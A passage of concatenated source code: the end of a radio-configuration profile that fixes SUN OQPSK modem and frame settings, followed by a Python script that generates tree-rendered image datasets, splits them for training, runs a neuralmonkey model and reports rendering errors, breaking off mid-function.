        self.make_required_input(profile, model.vars.sun_oqpsk_chiprate, "SUN",
                                 readable_name="SUN OQPSK Chiprate", value_limit_min=model.vars.sun_oqpsk_chiprate.var_enum._100_KCPS, value_limit_max=model.vars.sun_oqpsk_chiprate.var_enum._2000_KCPS)
        self.make_required_input(profile, model.vars.fcs_type_802154, 'SUN', readable_name="FCS Type (CRC)")
    def build_optional_profile_inputs(self, model, profile):
        """No optional inputs for this profile."""
        pass
    def build_advanced_profile_inputs(self, model, profile):
        """No advanced inputs for this profile."""
        pass
    def build_hidden_profile_inputs(self, model, profile):
        """Hidden inputs used only for internal testing and tuning."""
        # Hidden inputs to allow for fixed frame length testing
        self.make_hidden_input(profile, model.vars.frame_length_type, 'frame_general',
                               readable_name="Frame Length Algorithm")
        self.make_hidden_input(profile, model.vars.fixed_length_size, category='frame_fixed_length',
                               readable_name="Fixed Payload Size", value_limit_min=0, value_limit_max=0x7fffffff)
        # Hidden inputs to allow for keeping absolute tolerance the same when testing at 915M
        self.make_hidden_input(profile, model.vars.freq_offset_hz, 'Advanced',
                               readable_name="Frequency Offset Compensation (AFC) Limit", value_limit_min=0,
                               value_limit_max=500000, units_multiplier=UnitsMultiplier.KILO)
        #Hidden input for dual front-end filter support
        self.make_hidden_input(profile, model.vars.dual_fefilt, "Advanced",
                               readable_name="Dual front-end filter enable")
    def build_deprecated_profile_inputs(self, model, profile):
        """No deprecated inputs for this profile."""
        pass
    def build_register_profile_outputs(self, model, profile):
        """Register-level outputs: modem, frame, CRC, whitening and FEC blocks."""
        family = self._family
        build_modem_regs_ocelot(model, profile, family)
        buildFrameOutputs(model, profile, family)
        buildCrcOutputs(model, profile, family)
        buildWhiteOutputs(model, profile)
        buildFecOutputs(model, profile)
    def build_variable_profile_outputs(self, model, profile):
        """Software variable outputs (RAIL and IR calibration)."""
        self._sw_profile_outputs_common.build_rail_outputs(model, profile)
        self._sw_profile_outputs_common.build_ircal_outputs(model, profile)
    def build_info_profile_outputs(self, model, profile):
        """Informational outputs shared across 'sol' profiles."""
        self._sw_profile_outputs_common.build_info_outputs(model, profile)
    def profile_calculate(self, model):
        """Force the fixed PHY settings, then derive chiprate-dependent values."""
        self._fixed_sun_oqpsk_vars(model)
        self._lookup_from_oqpsk_chiprate(model)
    def _fixed_sun_oqpsk_vars(self, model):
        """Force every model variable that is constant across SUN OQPSK PHYs."""
        #AGC
        self._fixed_sun_oqpsk_agc(model)
        #OQPSK modulation on softmodem
        model.vars.modulation_type.value_forced = model.vars.modulation_type.var_enum.OQPSK
        model.vars.demod_select.value_forced = model.vars.demod_select.var_enum.SOFT_DEMOD
        #Tolerance
        model.vars.rx_xtal_error_ppm.value_forced = 0
        model.vars.tx_xtal_error_ppm.value_forced = 0
        model.vars.baudrate_tol_ppm.value_forced = 40
        model.vars.deviation_tol_ppm.value_forced = 0
        #Encoding and Whitening (unused)
        model.vars.diff_encoding_mode.value_forced = model.vars.diff_encoding_mode.var_enum.DISABLED
        model.vars.symbol_encoding.value_forced = model.vars.symbol_encoding.var_enum.NRZ
        model.vars.manchester_mapping.value_forced = model.vars.manchester_mapping.var_enum.Default
        model.vars.frame_coding.value_forced = model.vars.frame_coding.var_enum.NONE
        model.vars.white_poly.value_forced = model.vars.white_poly.var_enum.NONE
        model.vars.white_seed.value_forced = 0
        model.vars.white_output_bit.value_forced = 0
        #Preamble and syncword (unused)
        model.vars.preamble_length.value_forced = 32
        model.vars.preamble_pattern.value_forced = 0
        model.vars.preamble_pattern_len.value_forced = 4
        model.vars.syncword_0.value_forced = 0xe5
        model.vars.syncword_1.value_forced = 0
        model.vars.syncword_length.value_forced = 8
        #Shaping (unused)
        model.vars.shaping_filter.value_forced = model.vars.shaping_filter.var_enum.Custom_OQPSK
        model.vars.shaping_filter_param.value_forced = 0.0
        #Modulation parameters (unused)
        model.vars.deviation.value_forced = 0
        model.vars.fsk_symbol_map.value_forced = model.vars.fsk_symbol_map.var_enum.MAP0
        #Frame settings (unused)
        model.vars.frame_bitendian.value_forced = model.vars.frame_bitendian.var_enum.LSB_FIRST
        model.vars.frame_length_type.value_forced = model.vars.frame_length_type.var_enum.FIXED_LENGTH
        model.vars.payload_white_en.value_forced = False
        model.vars.payload_crc_en.value_forced = False
        model.vars.header_en.value_forced = True
        model.vars.header_size.value_forced = 1
        model.vars.header_calc_crc.value_forced = False
        model.vars.header_white_en.value_forced = False
        model.vars.var_length_numbits.value_forced = 8
        model.vars.var_length_bitendian.value_forced = model.vars.var_length_bitendian.var_enum.LSB_FIRST
        model.vars.var_length_shift.value_forced = 0
        model.vars.var_length_minlength.value_forced = 5
        model.vars.var_length_maxlength.value_forced = 0x7F
        model.vars.var_length_includecrc.value_forced = False
        model.vars.var_length_adjust.value_forced = 0
        model.vars.var_length_byteendian.value_forced = model.vars.var_length_byteendian.var_enum.LSB_FIRST
        model.vars.crc_seed.value_forced = 0x00000000
        model.vars.crc_input_order.value_forced = model.vars.crc_input_order.var_enum.LSB_FIRST
        model.vars.crc_bit_endian.value_forced = model.vars.crc_bit_endian.var_enum.MSB_FIRST
        model.vars.crc_byte_endian.value_forced = model.vars.crc_byte_endian.var_enum.MSB_FIRST
        model.vars.crc_pad_input.value_forced = False
        model.vars.crc_invert.value_forced = False
        model.vars.fixed_length_size.value_forced = 1
        model.vars.frame_type_0_filter.value_forced = True
        model.vars.frame_type_0_length.value_forced = 0
        model.vars.frame_type_0_valid.value_forced = False
        model.vars.frame_type_1_filter.value_forced = True
        model.vars.frame_type_1_length.value_forced = 0
        model.vars.frame_type_1_valid.value_forced = False
        model.vars.frame_type_2_filter.value_forced = True
        model.vars.frame_type_2_length.value_forced = 0
        model.vars.frame_type_2_valid.value_forced = False
        model.vars.frame_type_3_filter.value_forced = True
        model.vars.frame_type_3_length.value_forced = 0
        model.vars.frame_type_3_valid.value_forced = False
        model.vars.frame_type_4_filter.value_forced = True
        model.vars.frame_type_4_length.value_forced = 0
        model.vars.frame_type_4_valid.value_forced = False
        model.vars.frame_type_5_filter.value_forced = True
        model.vars.frame_type_5_length.value_forced = 0
        model.vars.frame_type_5_valid.value_forced = False
        model.vars.frame_type_6_filter.value_forced = True
        model.vars.frame_type_6_length.value_forced = 0
        model.vars.frame_type_6_valid.value_forced = False
        model.vars.frame_type_7_filter.value_forced = True
        model.vars.frame_type_7_length.value_forced = 0
        model.vars.frame_type_7_valid.value_forced = False
        model.vars.frame_type_bits.value_forced = 3
        model.vars.frame_type_loc.value_forced = 0
        model.vars.frame_type_lsbit.value_forced = 0
        #Other
        model.vars.asynchronous_rx_enable.value_forced = False
        model.vars.syncword_tx_skip.value_forced = False
    def _fixed_sun_oqpsk_agc(self, model):
        """AGC settings hook; intentionally empty for this family."""
        pass
    def _lookup_from_oqpsk_chiprate(self, model):
        """Derive bitrate and DSSS settings from the selected chiprate input."""
        #Read in the chiprate
        sun_oqpsk_chiprate = model.profile.inputs.sun_oqpsk_chiprate.var_value
        #Set the bitrate for SF1 (actual bitrate handled in softmodem since we don't know SF)
        if sun_oqpsk_chiprate == model.vars.sun_oqpsk_chiprate.var_enum._100_KCPS:
            bitrate = 100000
        elif sun_oqpsk_chiprate == model.vars.sun_oqpsk_chiprate.var_enum._400_KCPS:
            bitrate = 400000
        elif sun_oqpsk_chiprate == model.vars.sun_oqpsk_chiprate.var_enum._1000_KCPS:
            bitrate = 1000000
        else:
            bitrate = 2000000
        model.vars.bitrate.value_forced = bitrate
        model.vars.dsss_spreading_factor.value_forced = 1
        model.vars.dsss_chipping_code.value_forced = 0xA47C
        model.vars.dsss_len.value_forced = 16
<gh_stars>1-10
import json
import os
import random
from shutil import copyfile
from time import time
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image, ImageMath # Using https://pillow.readthedocs.io
import i2c_domain
from generator import Generator
from generator_static import ts
from i2c_domain import make_hand_crafted_examples
from i2c_render import render_to_file, render_to_img, render_to_img_with_phash
def i2c_gen(args):
    """CLI entry point: generate a dataset experiment from parsed arguments."""
    opts, out_dir = args.gen_opts, args.gen_dir
    print('i2c_gen(', opts, ',', out_dir, ')')
    prepare_experiment(opts, out_dir)
def i2c_run(args):
    """CLI entry point: run the trained model on the images given in args."""
    experiment, images = args.experiment_path, args.img_paths
    print('i2c_run(', experiment, ',', images, ')')
    run_model(experiment, images)
def main_prepare_experiment():
    """Convenience entry point: generate the 'few_big' experiment into imgs/gen."""
    prepare_experiment(gen_opts_template_name='few_big', path='imgs/gen')
def run_model(experiment_path, img_paths):
    """Run the trained neuralmonkey model on one or more images.

    Writes the image paths into the experiment's input file, invokes the
    neuralmonkey-run script through the shell, then reads the generated
    prefix codes back from the experiment's output file.

    Returns the list of output code strings (reading stops at the first
    blank line in the output file).

    NOTE(review): the command line is built by string concatenation and run
    via os.system -- paths containing spaces or shell metacharacters will
    break or be interpreted by the shell. Only call with trusted paths;
    consider subprocess.run([...], shell=False) if inputs can vary.
    """
    if isinstance(img_paths, str):
        # accept a single path as a convenience
        img_paths = [img_paths]
    print('TODO: Run model from experiment dir', experiment_path, 'on images', img_paths)
    nm_path = '../neuralmonkey'
    if not nm_path.endswith('/'):
        nm_path += '/'
    if not experiment_path.endswith('/'):
        experiment_path += '/'
    nm_run_path = nm_path + 'bin/neuralmonkey-run'
    data_experiment_ini = experiment_path + 'data_experiment.ini'
    data_ini = experiment_path + 'data_generated.ini'
    input_file_path = experiment_path + 'data/run_imgs_generated.txt'
    # hand the image list to the model via its input file
    with open(input_file_path, 'w') as f_input_imgs:
        for img_path in img_paths:
            f_input_imgs.write("%s\n" % img_path)
            print('input_img -> %s' % img_path)
    cmd_str = 'python ' + nm_run_path + ' ' + data_experiment_ini + ' ' + data_ini
    print(cmd_str)
    os.system(cmd_str)
    # collect the decoded codes written by the model
    output_file_path = experiment_path + 'out/model_outputs_generated.txt'
    codes = []
    with open(output_file_path, 'r') as f_output_codes:
        while True:
            code_str = f_output_codes.readline().strip()
            if code_str:
                print('output_code -> %s' % code_str)
                codes.append(code_str)
            else:
                print('')
                break
    print('codes:', codes)
    return codes
def test_big_image():
    """Create thumbnails of one big image with every Pillow resampling filter.

    Saves one small PNG per filter next to the source image so the results
    can be compared visually. I/O errors are reported, not raised.
    """
    experiment_path = 'imgs/results/results_haf_64/' # '../experiments/haf_64/'
    # params
    big_img_path = experiment_path + 'imgs_big/floral.png'
    small_img_size = 64, 64
    print('Test big image...')
    def save_thumbnail(small_img_path, thumbnail_method):
        # shrink the big image with the given resampling filter and save it
        try:
            im = Image.open(big_img_path)
            im.thumbnail(small_img_size, thumbnail_method)
            im.save(small_img_path, "png")
            print('Thumbnail for "%s" created: "%s"' % (big_img_path, small_img_path))
        except IOError:
            print('Cannot create thumbnail for "%s"' % big_img_path)
    # Use the canonical filter names: ANTIALIAS, LINEAR and CUBIC were
    # deprecated aliases (ANTIALIAS == LANCZOS, LINEAR == BILINEAR,
    # CUBIC == BICUBIC) and were removed in Pillow 10, so the old names
    # raise AttributeError on current Pillow. Behavior is identical.
    save_thumbnail(experiment_path + 'imgs_big/floral.small_0.png', Image.NEAREST)
    save_thumbnail(experiment_path + 'imgs_big/floral.small_1.png', Image.LANCZOS)
    save_thumbnail(experiment_path + 'imgs_big/floral.small_2.png', Image.BILINEAR)
    save_thumbnail(experiment_path + 'imgs_big/floral.small_3.png', Image.BICUBIC)
    save_thumbnail(experiment_path + 'imgs_big/floral.small_4.png', Image.BOX)
    save_thumbnail(experiment_path + 'imgs_big/floral.small_5.png', Image.HAMMING)
def prepare_experiment(gen_opts_template_name='small', path='imgs/gen'):
    """Generate a full experiment dataset and split it into train/dev subsets.

    gen_opts_template_name selects one of the generation-option templates
    defined below (see gen_opts_lib); path is the output directory for all
    generated files. Raises KeyError for an unknown template name.
    """
    # Parameters:
    #   path ... 'imgs/gen' '../ubuntu-cabin/experiment/data'
    #   gen_opts_template_name ... '003similar'
    domain_maker_name = 'family_1'
    train_validate_ratio = 0.8
    target_name = 'prefix'
    generate_handmade_examples = True
    # perceptual-hash options used for duplicate detection during generation
    hash_opts = {
        'hash_size': 32,
        'highfreq_factor': 4
    }
    # Derived parameters: Various gen_opts templates:
    dim_size = 32
    img_size = (dim_size, dim_size)
    if not path.endswith('/'):
        path += '/'
    gen_opts_full = {
        'max_tree_size': 51,
        'exhaustive_generating_limit': 250000,
        'sample_method': {'name': 'fixed_attempts', 'num_attempts': 20000},
        'domain_maker': domain_maker_name,
        'hash_opts': hash_opts,
        'img_size': img_size,
        'path': path
    }
    gen_opts_requested_128 = {
        'max_tree_size': 13,
        'exhaustive_generating_limit': 250000,
        'sample_method': {'name': 'fixed_attempts', 'num_attempts': 100000},
        'domain_maker': 'family_1',
        'hash_opts': hash_opts,
        'img_size': (128, 128),
        'path': path
    }
    gen_opts_requested_64 = {
        'max_tree_size': 13,
        'exhaustive_generating_limit': 250000,
        'sample_method': {'name': 'fixed_attempts', 'num_attempts': 100000},
        'domain_maker': 'family_1',
        'hash_opts': hash_opts,
        'img_size': (64, 64),
        'path': path
    }
    gen_opts_003similar = {
        'max_tree_size': 13,
        'exhaustive_generating_limit': 250000,
        'sample_method': {'name': 'fixed_attempts', 'num_attempts': 100000},
        'domain_maker': 'family_1',
        'hash_opts': hash_opts,
        'img_size': img_size,
        'path': path
    }
    gen_opts_small = {
        'max_tree_size': 17,
        'exhaustive_generating_limit': 2500,
        'sample_method': {'name': 'fixed_attempts', 'num_attempts': 100},
        'domain_maker': domain_maker_name,
        'hash_opts': hash_opts,
        'img_size': img_size,
        'path': path
    }
    gen_opts_few_big = {
        'min_tree_size': 63,
        'max_tree_size': 63,
        'exhaustive_generating_limit': 2500,
        'sample_method': {'name': 'fixed_attempts', 'num_attempts': 100},
        'domain_maker': domain_maker_name,
        'hash_opts': hash_opts,
        'img_size': (512, 512),
        'path': path
    }
    # template name -> options mapping used by the lookup below
    gen_opts_lib = {
        'full': gen_opts_full,
        'requested_128': gen_opts_requested_128,
        'requested_64': gen_opts_requested_64,
        '003similar': gen_opts_003similar,
        'small': gen_opts_small,
        'few_big': gen_opts_few_big
    }
    # Run quick example generation, handy for visual check that imggenerator works properly.
    if generate_handmade_examples:
        save_hand_crafted_examples((512, 512), path + 'imgs/handmade_examples/')
    # Generate dataset (not yet split into train and validate subsets)
    gen_opts = gen_opts_lib[gen_opts_template_name]
    generate_dataset(gen_opts)
    # Split generated dataset to subsets (i.e. train, validate)
    split_dataset(gen_opts, target_name, train_validate_ratio)
def split_dataset(gen_opts, target_name, train_validate_ratio):
    """Shuffle the generated dataset and write train/dev input+target files.

    Pairs the generated image list with the target file selected by
    target_name (line by line), shuffles the pairs, and splits them by
    train_validate_ratio into 'train_*' and 'dev_*' files inside the
    experiment directory. Raises RuntimeError if the split sizes are
    inconsistent.
    """
    input_name = 'imgs'
    path_experiment_dir = gen_opts['path']
    if not path_experiment_dir.endswith('/'):
        path_experiment_dir += '/'
    path_imgs_txt = gen_opts['paths'][input_name]
    path_targets_txt = gen_opts['paths'][target_name]
    dataset = []
    zip_files(path_imgs_txt, path_targets_txt, lambda img, code: dataset.append((img, code)))
    num_all = len(dataset)
    num_train = int(round(num_all * train_validate_ratio))
    num_valid = num_all - num_train
    random.shuffle(dataset)
    train_dataset = dataset[:num_train]
    valid_dataset = dataset[num_train:num_all]
    # sanity checks on the split sizes
    if len(train_dataset) != num_train:
        raise RuntimeError('Wrong number of train instances.')
    if len(valid_dataset) != num_valid:
        raise RuntimeError('Wrong number of validation instances.')
    def generate_subset_files(prefix, sub_dataset):
        # write parallel <prefix>_imgs.txt and <prefix>_<target>.txt files
        prefix = path_experiment_dir + prefix
        inputs_filename = prefix + '_' + input_name + '.txt'
        targets_filename = prefix + '_' + target_name + '.txt'
        with open(inputs_filename, 'w') as f_inputs:
            with open(targets_filename, 'w') as f_targets:
                for (img, code) in sub_dataset:
                    f_inputs.write("%s\n" % img)
                    f_targets.write("%s\n" % code)
    generate_subset_files('train', train_dataset)
    generate_subset_files('dev', valid_dataset)
def main():
    """Ad-hoc entry point: render handmade examples and generate a test dataset."""
    save_hand_crafted_examples((512, 512)) # Run quick example generation ..
    path = 'imgs/gen'
    dim_size = 32
    img_size = (dim_size, dim_size)
    # perceptual-hash options used for duplicate detection
    hash_opts = {
        'hash_size': 32,
        'highfreq_factor': 4
    }
    # full-size generation options (kept for the commented switch below)
    gen_opts_full = {
        'max_tree_size': 51,
        'exhaustive_generating_limit': 250000,
        'sample_method': {
            'name': 'fixed_attempts',
            'num_attempts': 20000
        },
        'domain_maker': 'family_1',
        'hash_opts': hash_opts,
        'img_size': img_size,
        'path': path
    }
    gen_opts_requested = {
        'max_tree_size': 13,
        'exhaustive_generating_limit': 250000,
        'sample_method': {
            'name': 'fixed_attempts',
            'num_attempts': 100000
        },
        'domain_maker': 'family_1',
        'hash_opts': hash_opts,
        'img_size': (128, 128),
        'path': path
    }
    # small/fast options actually used by default
    gen_opts_test = {
        'max_tree_size': 17,
        'exhaustive_generating_limit': 2500,
        'sample_method': {
            'name': 'fixed_attempts',
            'num_attempts': 100
        },
        'domain_maker': 'family_1',
        'hash_opts': hash_opts,
        'img_size': img_size,
        'path': path
    }
    generate_dataset(gen_opts_test)
    # generate_dataset(gen_opts_full)
    # generate_dataset(gen_opts_requested)
def main_process_results():
    """Evaluate model outputs against the reference dataset and build an HTML report.

    Reads paired input-image names and predicted prefix codes, renders each
    (arity-repaired) prediction to an image, measures the pixel error versus
    the input image, and writes summary stats, the report's JSON data file
    and an error histogram PNG.
    """
    dataset_id = 'haf_64' # '003'
    results_root_dir_path = 'imgs/results/'
    results_dir_path = results_root_dir_path + 'results_' + dataset_id + '/'
    inputs_path = results_dir_path + 'dev_imgs.txt'
    outputs_path = results_dir_path + 'prefixes_out.txt'
    report_path = results_dir_path + 'report.html'
    report_template_path = results_root_dir_path + 'js/report.html'
    report_js_path = results_dir_path + 'report-data.js'
    dataset_path = results_dir_path + 'dataset/'
    dataset_imgs_path = dataset_path + 'imgs.txt'
    dataset_prefix_path = dataset_path + 'prefix.txt'
    in_imgs_path = results_dir_path + 'imgs/'
    out_imgs_path = results_dir_path + 'imgs_out/'
    ensure_dir(out_imgs_path)
    open(report_js_path, 'w').close()
    worst_err = 0.0
    sum_err = 0.0
    i = 0
    rows = []
    num_absolute_matches = 0
    errs = []
    num_mismatches = 0
    correct_codes = {}
    with open(inputs_path) as f_in:
        with open(outputs_path) as f_out:
            while True:
                in_line = f_in.readline().strip()
                out_line = f_out.readline().strip()
                if (not in_line) or (not out_line):
                    break
                # repair the predicted prefix code if its arities don't add up
                corrected_code, mismatch = from_prefix_notation_family_1(out_line)
                correct_codes[in_line] = ''
                in_img_path = in_imgs_path + in_line
                out_img_path = out_imgs_path + in_line
                input_im = Image.open(in_img_path)
                # BUG FIX: previously this tested os.path.isfile(out_imgs_path)
                # -- the directory, never a file -- so every image was
                # re-rendered on every run; test the output image path instead.
                if not os.path.isfile(out_img_path):
                    render_to_file(out_img_path, input_im.size, corrected_code)
                output_im = Image.open(out_img_path)
                err = imgs_err(input_im, output_im)
                errs.append(err)
                sum_err += err
                if err == 0.0:
                    num_absolute_matches += 1
                if err > worst_err:
                    worst_err = err
                rows.append([in_line, out_line, err])
                print("%s -> %s ... %.10f ... mismatch=%d" % (in_line, out_line, err, mismatch))
                if mismatch != 0:
                    num_mismatches += 1
                    print('---> mismatch != 0')
                i += 1
    def step(img_filename, correct_prefix):
        # attach the ground-truth prefix to every image we evaluated
        if img_filename in correct_codes:
            correct_codes[img_filename] = correct_prefix
    zip_files(dataset_imgs_path, dataset_prefix_path, step)
    # NOTE(review): empty input/output files leave i == 0 and the two
    # divisions below raise ZeroDivisionError -- assumed non-empty here.
    stats = {
        'num_test_instances': i,
        'num_absolute_matches': num_absolute_matches,
        'percent_absolute_matches': (100.0 * num_absolute_matches / i),
        'mean_error': (sum_err / i),
        'worst_error': worst_err,
        'num_mismatches': num_mismatches
    }
    stats_str = '\n'
    stats_str += 'Number of test instances: %d\n' % stats['num_test_instances']
    stats_str += 'Number of absolute matches: %d\n' % stats['num_absolute_matches']
    stats_str += 'Percent absolute matches: %f\n' % stats['percent_absolute_matches']
    stats_str += 'Mean error: %.5f\n' % stats['mean_error']
    stats_str += 'Worst error: %.10f\n' % stats['worst_error']
    stats_str += 'Number of output codes in incorrect format: %d\n' % stats['num_mismatches']
    print(stats_str)
    print('Generating report.html ...')
    # worst-first ordering for the report table
    rows.sort(key=lambda r: -r[2])
    for row in rows:
        row[1] = row[1], correct_codes[row[0]]
    err_hist_filename = 'error_hist.png'
    copyfile(report_template_path, report_path)
    report_json = {
        'stats': stats,
        'table': rows
    }
    with open(report_js_path, 'w') as f_report_js:
        f_report_js.write('report_data = %s;' % json.dumps(report_json, indent=0))
    plt.title('Histogram of error on test data')
    plt.xlabel('Error')
    plt.ylabel('N')
    plt.hist(errs, bins=23)
    plt.savefig(results_dir_path + err_hist_filename)
    # plt.show()
    print('Done.')
def test_histogram():
    """Visual smoke test: show a histogram of 1000 standard-normal samples."""
    print('Testing histogram, bro.')
    samples = np.random.randn(1000)
    plt.hist(samples)
    plt.show()
def process_raw_dataset(data_path, classes_info, num_instances_per_class, train_validate_ratio):
    """Build balanced train/validation folders from a raw per-class dataset.

    For each class in classes_info (dicts with 'name', 'num', 'path'),
    instances are oversampled -- by re-copying existing files under a
    'c<i>_' filename prefix -- up to num_instances_per_class, shuffled,
    and split between data_path/train/<class>/ and
    data_path/validation/<class>/.

    Raises RuntimeError when a class folder's file count does not match
    the count recorded in classes_info.
    """
    ensure_dir(data_path)
    num_train = int(round(num_instances_per_class * train_validate_ratio))
    train_path = ensure_dir(data_path + 'train/')
    valid_path = ensure_dir(data_path + 'validation/')
    for info in classes_info:
        name, num, class_path = info['name'], info['num'], info['path']
        print("%s : %d" % (name, num))
        filenames = os.listdir(class_path)
        if len(filenames) != num:
            raise RuntimeError('Wrong number of instances in ' + class_path)
        random.shuffle(filenames)
        src_dst_pairs = [(f, f) for f in filenames]
        if num < num_instances_per_class:
            # oversample: duplicate existing files under new names
            num_to_copy = num_instances_per_class - num
            for i in range(num_to_copy):
                src = filenames[i % num]
                dst = 'c' + str(i + 1) + '_' + src
                src_dst_pairs.append((src, dst))
        train_c_path = ensure_dir(train_path + name + '/')
        valid_c_path = ensure_dir(valid_path + name + '/')
        random.shuffle(src_dst_pairs)
        for (src, dst) in src_dst_pairs[:num_train]:
            src_path = class_path + src
            dst_path = train_c_path + dst
            copyfile(src_path, dst_path)
        for (src, dst) in src_dst_pairs[num_train:num_instances_per_class]:
            src_path = class_path + src
            dst_path = valid_c_path + dst
            copyfile(src_path, dst_path)
def make_classes_info(classes_path, class_names_path, correct_classes_path):
    """Tally class frequencies from a label file and write a JSON summary.

    Reads class names line by line from correct_classes_path (stopping at
    the first blank line), counts occurrences, and writes the per-class
    info records -- sorted by descending count -- to class_names_path.
    """
    tally = {}
    with open(correct_classes_path, 'r') as f:
        while True:
            name = f.readline().strip()
            if not name:
                break
            if name not in tally:
                tally[name] = {'name': name, 'num': 0, 'path': classes_path + name + '/'}
            tally[name]['num'] += 1
    # most frequent classes first (stable, so ties keep first-seen order)
    classes_info = sorted(tally.values(), key=lambda o: -o['num'])
    print(classes_info)
    with open(class_names_path, 'w') as f:
        f.write(json.dumps(classes_info, indent=2))
def prepare_nn_dataset_raw(imgs_path, classes_path, img_filenames_path, correct_classes_path):
    """Copy each listed image into a per-class subfolder of classes_path.

    Image filenames and their class labels are read in lockstep from the
    two given text files.
    """
    ensure_dir(classes_path)
    def copy_into_class(img_filename, correct_class):
        # place the image under its class directory, creating it on demand
        target_dir = classes_path + correct_class + '/'
        ensure_dir(target_dir)
        src = imgs_path + img_filename
        dst = target_dir + img_filename
        copyfile(src, dst)
        print("%s -> %s" % (src, dst))
    zip_files(img_filenames_path, correct_classes_path, copy_into_class)
def zip_files(path1, path2, f):
    """Read two text files line by line in lockstep, calling f(line1, line2).

    Lines are stripped; iteration stops at the first blank (or missing)
    line in either file.
    """
    with open(path1) as first, open(path2) as second:
        while True:
            left = first.readline().strip()
            right = second.readline().strip()
            if not left or not right:
                break
            f(left, right)
def generate_dataset(gen_opts):
    """Generate the image dataset described by gen_opts.

    For each tree size in [min_tree_size, max_tree_size]: enumerate all
    trees exhaustively when their count is below the configured limit,
    otherwise sample them with the configured sample method. Each candidate
    is rendered and kept only when its perceptual hash is new (see
    generate_step). Per-size progress and final totals are appended to the
    markdown stats file.
    """
    start_time = time()
    gen_opts['paths'] = init_files(gen_opts['path'])
    save_stats_header(gen_opts)
    domain_maker = i2c_domain.family_lib[gen_opts['domain_maker']]
    goal, gamma = domain_maker()
    gen = Generator(gamma)
    img_hashes = {}
    next_img_id = 1
    attempt = 0
    min_tree_size = gen_opts.get('min_tree_size', 1)
    max_tree_size = gen_opts['max_tree_size']
    exhaustive_generating_limit = gen_opts['exhaustive_generating_limit']
    sample_method = gen_opts['sample_method']
    sample_method_name = sample_method['name']
    for tree_size in range(min_tree_size, max_tree_size + 1):
        one_size_start_time = time()
        num_trees = gen.get_num(tree_size, goal)
        next_img_id_start = next_img_id
        print('tree_size =', tree_size, "-> num_trees =", num_trees)
        if num_trees > 0:
            if num_trees < exhaustive_generating_limit:
                # few enough trees: enumerate every one of them
                gen_method_name = 'exhaustive'
                num_attempts = num_trees
                for tree_data in ts(gamma, tree_size, goal, 0):
                    tree = tree_data.tree
                    attempt += 1
                    next_img_id = generate_step(gen_opts, tree, img_hashes, tree_size, next_img_id, attempt)
            else:
                # too many trees: fall back to sampling
                gen_method_name = sample_method_name
                if sample_method_name == 'fixed_attempts':
                    num_attempts = sample_method['num_attempts']
                    for i_sample in range(num_attempts):
                        tree = gen.gen_one(tree_size, goal)
                        attempt += 1
                        next_img_id = generate_step(gen_opts, tree, img_hashes, tree_size, next_img_id, attempt)
                else:
                    num_attempts = -1
                    print('WARNING: Using unsupported sampling method.')
        # NOTE(review): gen_method_name/num_attempts are only assigned inside
        # the `num_trees > 0` branch; a size with zero trees reuses the
        # previous iteration's values (or raises NameError on the first one).
        new_for_this_size = next_img_id - next_img_id_start
        one_size_delta_time = time() - one_size_start_time
        save_stats_size_info(gen_opts, tree_size, num_trees, gen_method_name, num_attempts, new_for_this_size,
                             one_size_delta_time)
    # save stats and we are done ..
    num_generated_trees = next_img_id - 1
    delta_time = time() - start_time
    save_stats_footer(gen_opts, num_generated_trees, attempt, delta_time)
    print(gen_opts['stats'])
def generate_step(gen_opts, tree, img_hashes, tree_size, next_img_id, attempt):
    """Render one candidate tree; keep it only when its perceptual hash is new.

    Returns the next free image id (incremented only when the tree was kept).
    """
    img_code = tree.to_sexpr_json()
    im, img_hash = render_to_img_with_phash(gen_opts, img_code)
    if img_hash in img_hashes:
        # duplicate image (up to perceptual hash) -> discard
        return next_img_id
    img_hashes[img_hash] = tree_size
    save_generated_tree_data(gen_opts, next_img_id, im, img_code, tree, tree_size, attempt)
    return next_img_id + 1
def init_files(path):
    """Create the experiment directory layout and truncate all output files.

    Returns a dict of named paths used throughout the generation run.
    """
    if not path.endswith('/'):
        path += '/'
    ensure_dir(path)
    imgs_dir = path + 'imgs/'
    ensure_dir(imgs_dir)
    img_pattern_short = '%08d.png'
    paths = {
        'img_pattern_short': img_pattern_short,
        'img_pattern': imgs_dir + img_pattern_short,
        'imgs': path + 'imgs.txt',
        'stats': path + 'stats.md',
        'jsons': path + 'jsons.txt',
        'prefix': path + 'prefix.txt',
        'roots': path + 'roots.txt'
    }
    # truncate (or create) every per-run text output
    for key in ('imgs', 'stats', 'jsons', 'prefix', 'roots'):
        open(paths[key], 'w').close()
    return paths
def save_generated_tree_data(gen_opts, img_id, im, img_code, tree, tree_size, attempt):
    """Persist one accepted tree: its PNG image plus one line in each text file."""
    paths = gen_opts['paths']
    img_path = paths['img_pattern'] % img_id
    im.save(img_path, 'PNG')
    prefix_code = to_prefix_notation(img_code)
    # one parallel line per output file, all keyed by the same img_id
    append_line(paths['imgs'], paths['img_pattern_short'] % img_id)
    append_line(paths['roots'], root_symbol(img_code))
    append_line(paths['prefix'], prefix_code)
    append_line(paths['jsons'], str(img_code))
    print('%-7d->' % img_id, img_path, "attempt=%d" % attempt, "tree_size=%d" % tree_size)
    print('\t\ttree =', prefix_code)
def save_stats_header(gen_opts):
    """Write the markdown stats preamble: gen_opts dump plus the table header."""
    opts_json = json.dumps(gen_opts, sort_keys=True, indent=2, separators=(',', ': '))
    header_cells = ('Tree size', 'Num of all trees', 'Generating method', 'Attempts',
                    'New trees', 'New/Attempts %', 'Time')
    pieces = [
        '# Stats #\n\n',
        '## gen_opts ##\n\n',
        '```json\n%s\n```\n\n' % opts_json,
        '## Stats for tree sizes ##\n\n',
        '| %-9s | %-40s | %-17s | %-10s | %-10s | %-14s | %-14s |\n' % header_cells,
        '| %s | %s | %s | %s | %s | %s | %s |\n' % (
            '-' * 9, '-' * 40, '-' * 17, '-' * 10, '-' * 10, '-' * 14, '-' * 14),
    ]
    # reset the in-memory stats accumulator before the first append
    gen_opts['stats'] = ''
    append_stats(gen_opts, ''.join(pieces))
def save_stats_size_info(gen_opts, tree_size, num_trees, gen_method_name, num_attempts, new_for_this_size, time):
    """Append one row of the per-tree-size markdown stats table."""
    hit_rate = (100.0 * new_for_this_size) / num_attempts
    row = '| %-9d | %-40d | %-17s | %-10d | %-10d | %-14.2f | %-14.2f |\n' % (
        tree_size, num_trees, gen_method_name, num_attempts, new_for_this_size, hit_rate, time)
    append_stats(gen_opts, row)
def save_stats_footer(gen_opts, num_generated_trees, attempts, delta_time):
    """Append the closing summary section of the stats file."""
    pieces = [
        '\n## Final stats ##\n\n',
        '* Num Generated Images: %d\n' % num_generated_trees,
        '* Num Attempts: %d\n' % attempts,
